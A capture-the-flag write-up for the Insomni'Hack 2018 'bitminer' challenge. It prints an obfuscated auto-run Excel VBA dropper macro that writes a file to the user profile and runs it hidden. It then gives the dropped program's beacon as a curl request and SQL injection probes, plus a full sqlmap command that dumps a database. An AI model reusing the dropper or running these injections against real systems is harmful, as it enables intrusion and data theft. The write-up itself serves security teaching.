Insomni'Hack 2018 - vba02-bitminer
CTF URL: 21 / Points: 142
Challenge description
Oh no I opened an email attachment AGAIN!! Help me to take my revenge. Here is the file I downloaded:
Challenge resolution
This begins again with a .xls file. We follow the same steps as the first vba
challenge to get the macro:
Attribute VB_Name = "Module1"
Sub Auto_Open()
Predict ("Sheet1")
End Sub
Sub Workbook_Open()
Predict ("Sheet1")
End Sub
Private Function Predict(ByVal z As String) As String
Dim zzzz As String
zzzz = "bitcoin.txt"
Dim zzzzz As String
zzzzz = Environ("USERPROFILE")
ChDrive (zzzzz)
Dim zzzzzz As Integer
ChDir (zzzzz)
zzzzzz = FreeFile()
Dim zzzzzzz As Integer
Dim zz As Integer
zz = 4
Open zzzz For Binary As zzzzzz
Dim zzz As Worksheet
On Error GoTo e
Set zzz = Worksheets(z)
zzzzzzz = 1
Do While zzz.Columns(zzzzzzz).Cells(zz, (3 / 2)).Value <> ""
Do While zzz.Columns(zzzzzzz).Cells(zz, (109 / 87)).Value <> ""
Put #zzzzzz, , CByte(zzz.Columns(zzzzzzz).Cells(zz, (5471 / 4871)).Value Xor (42 * 2 + 1))
zzzzzzz = zzzzzzz + (781625 / 679142)
zz = zz + Sqr(2)
zzzzzzz = 1
Close #zzzzzz
zzzzzzzz = Shell(zzzz, vbHide)
Exit Function
MsgBox "Unable to predict the future"
Exit Function
End Function
We skip the obfuscated components to focus on the important behavior: it creates a file into the %userprofile%
folder and runs it. We defang the macro by removing the ‘Shell’ line, open the Excel file and retrieve the ‘bitcoin.txt’ file it created. Running it in a controlled environment, we see it uses WMI to gather information about the system on which it runs and generates HTTP requests that can be translated into the following curl
curl -i -X 'POST' \
-H 'User-Agent: Bitcoin Mining $couter 0.1 Beta 1337' -H 'Expect: 100-continue' \
--data '<Base64-encoded string>' \
The decoded Base64 is a JSON object with the following format:
"cpu":"Intel(R) Core(TM) i5-4310U CPU @ 2.00GHz",
"gpu":"Carte vidéo de base Microsoft"
After playing with the JSON contents, we identify that the server generates an error when a single quote is present in the gpu field. The vulnerability seems to be an SQL injection which can be easily checked by sending the following gpu
' or 1=1 --
always true, returnsgo
' or 1=0 --
always false, returnspwaaa
Since we are lazy hackers, we use sqlmap to extract the database contents. To do so, we use the -r
option to define a file containing all of the request information (*
is used to mark the injection point):
$ cat raw_request
POST /?a=benchmark HTTP/1.1
Host: bitminer.insomni.hack
User-Agent: Bitcoin Mining $couter 0.1 Beta 1337
Expect: 100-continue
Content-Length: 148
Content-Type: application/x-www-form-urlencoded
And run the following sqlmap command:
$ sqlmap -r raw_request --tamper base64encode --prefix $'{"cid":"NOT-A-SANDBOX","cpu":"Intel(R) Core(TM) i5-4310U CPU @ 2.00GHz","gpu":"\' or 1=1 ' --suffix ' -- a"}' --skip-urlencode --level 5 --string go --technique B --dump
Finaly, we retrieve the flag from the flag table: INS{M1ninG_i5_t0o_H4rD_Lets_D0_Norm4l_Cyb3rCr1me}
Post date: 2018-03-25